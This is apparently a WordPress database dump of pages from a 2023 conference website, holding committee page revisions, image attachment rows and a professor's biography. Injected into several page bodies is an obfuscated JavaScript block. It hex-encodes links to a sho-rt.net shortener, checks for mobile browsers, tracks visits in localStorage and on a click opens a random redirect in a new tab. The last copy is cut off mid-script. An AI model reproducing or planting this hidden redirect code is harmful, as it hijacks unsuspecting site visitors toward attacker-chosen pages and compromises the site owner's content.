(3561,1,'2023-01-14 19:35:53','2023-01-14 19:35:53','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"66\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Science Committee','','inherit','closed','closed','','3554-revision-v1','','','2023-01-14 19:35:53','2023-01-14 19:35:53','',3554,'https://gsw2023.com/?p=3561',0,'revision','',0),
(3570,1,'2023-01-14 20:15:13','2023-01-14 20:15:13','','loc1-1','','inherit','open','closed','','loc1-1','','','2023-01-14 20:15:13','2023-01-14 20:15:13','',3559,'https://gsw2023.com/wp-content/uploads/2023/01/loc1-1.jpg',0,'attachment','image/jpeg',0),
(3572,1,'2023-01-14 20:26:52','2023-01-14 20:26:52','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Science Committee','','inherit','closed','closed','','3554-revision-v1','','','2023-01-14 20:26:52','2023-01-14 20:26:52','',3554,'https://gsw2023.com/?p=3572',0,'revision','',0),
(3574,1,'2023-01-14 20:29:39','2023-01-14 20:29:39','','loc1-2','','inherit','open','closed','','loc1-2','','','2023-01-14 20:29:39','2023-01-14 20:29:39','',3559,'https://gsw2023.com/wp-content/uploads/2023/01/loc1-2.jpg',0,'attachment','image/jpeg',0),
(3577,1,'2023-01-14 20:36:41','2023-01-14 20:36:41','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:cover {\"overlayColor\":\"accent\"} -->\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-accent-background-color has-background-dim-100 has-background-dim\"></span><div class=\"wp-block-cover__inner-container\"><!-- wp:paragraph {\"align\":\"center\",\"placeholder\":\"Write title…\",\"fontSize\":\"large\"} -->\n<p class=\"has-text-align-center has-large-font-size\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>Professor of Geomatics and Geoinformatics<br>Acting Dean for the Faculty of Engineering &amp; Materials Science<br>Director of the Civil Engineering Program<br>moustafa.baraka@guc.edu.eg<br>German University in Cairo - GUC<br><a href=\"http://www.guc.edu.eg\">www.guc.edu.eg</a><br>&nbsp;<br>Acting Dean of Faculty of Engineering &amp; Materials Science, and Director of Civil Engineering Program, at the German University in Cairo. Professor emeritus, Faculty of Engineering, Cairo University. &nbsp;Prof. Moustafa Baraka received his &nbsp;Ph.D. from Geodetic Science and Surveying Department, Ohio State University U.S.A. Research and teaching in areas of; Global Navigation Satellite Systems/Global Positioning System (GNSS/GPS), Geomatics &amp; Geoinformatics, Laser Scanning, and Building Information Modelling (BIM). Prof. Baraka has over 70 published papers in journal and conferences, supervised more than 38 M.Sc. and PhD.<br>Prof. Baraka is member of; The Egyptian Committees for&nbsp; Code and Standards for Building Information Modeling (BIM), International Federation of Surveyors (FIG) Commission 8 (Spatial planning &amp; Development), The National Delegate Representative, The Egyptian Committee Surveying and Mapping, The Egyptian Engineers Syndicate Standing Committee Consultant Accreditation for Surveying Sciences, The Egyptian Geographic Society, The Arab Institute for Navigation, The Egyptian Society for Geophysical Sciences. The Egyptian Engineers Syndicate.</td></tr></tbody></table></figure>\n<!-- /wp:table --></div></div>\n<!-- /wp:cover -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 